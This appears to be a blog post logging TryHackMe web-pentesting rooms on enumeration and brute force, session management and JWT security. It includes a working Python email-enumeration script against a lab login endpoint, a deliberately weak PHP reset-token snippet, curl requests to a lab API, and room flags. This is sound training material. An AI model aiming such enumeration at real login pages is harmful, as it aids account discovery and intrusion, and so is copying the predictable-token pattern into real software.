Skip to main content

Training Update v0.87

blank
blank

It’s Wednesday the 2nd of April and it’s (yes we know) time for more THM!

Today we move on to the Web Application Pentesting pathway!

We start off with the Enumeration & Brute Force room to kick this all off!

blank
blank
blank
blank
blank
blank
blank
blank
blank
import requests
import sys
def check_email(email):
url = 'http://enum.thm/labs/verbose_login/functions.php'  # Location of the login function
headers = {
'Host': 'enum.thm',
'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin': 'http://enum.thm',
'Connection': 'close',
'Referer': 'http://enum.thm/labs/verbose_login/',
}
data = {
'username': email,
'password': 'password',  # Use a random password as we are only checking the email
'function': 'login'
}
response = requests.post(url, headers=headers, data=data)
return response.json()
def enumerate_emails(email_file):
valid_emails = []
invalid_error = "Email does not exist"  # Error message for invalid emails
with open(email_file, 'r') as file:
emails = file.readlines()
for email in emails:
email = email.strip()  # Remove any leading/trailing whitespace
if email:
response_json = check_email(email)
if response_json['status'] == 'error' and invalid_error in response_json['message']:
print(f"[INVALID] {email}")
else:
print(f"[VALID] {email}")
valid_emails.append(email)
return valid_emails
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 script.py <email_list_file>")
sys.exit(1)
email_file = sys.argv[1]
valid_emails = enumerate_emails(email_file)
print("\nValid emails found:")
for valid_email in valid_emails:
print(valid_email)
blank
blank
blank
blank
blank
blank
blank
blank
blank
$token = mt_rand(100, 200);
$query = $conn->prepare("UPDATE users SET reset_token = ? WHERE email = ?");
$query->bind_param("ss", $token, $email);
$query->execute();
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank

Flag – THM{50_pr3d1ct4BL333!!}

blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank

Add second rule encode as base64

blank

Remove = (padding)

blank
blank
blank
blank
blank

Flag – THM{b4$$1C_AuTTHHH}

blank
blank
blank
blank

Now we move on to the Session Management module!

blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank
blank

Now we move on to the JWT Security security room!

blank
blank
blank
blank
blank
curl -H 'Content-Type: application/json' -X POST -d '{ "username" : "user", "password" : "passwordX" }' http://10.10.22.216/api/v1.0/exampleX
curl -H 'Authorization: Bearer [JWT token]' http://10.10.22.216/api/v1.0/example2?username=Y
blank
blank
blank
blank
blank
blank

https://jwt.io

blank
blank

Flag – THM{9cc039cc-d85f-45d1-ac3b-818c8383a560}

blank
blank
blank
blank
blank
blank
blank

Flag – THM{6e32dca9-0d10-4156-a2d9-5e5c7000648a}

blank
blank

This module/room I’m not quite getting at the present moment so we shall continue this tomorrow!

blank
blank

Until next time & don’t sleepwalk through life!

Slán